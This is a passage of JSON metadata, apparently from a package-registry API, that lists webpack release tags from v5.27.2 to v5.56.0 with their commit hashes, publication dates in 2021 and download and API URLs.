eleases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp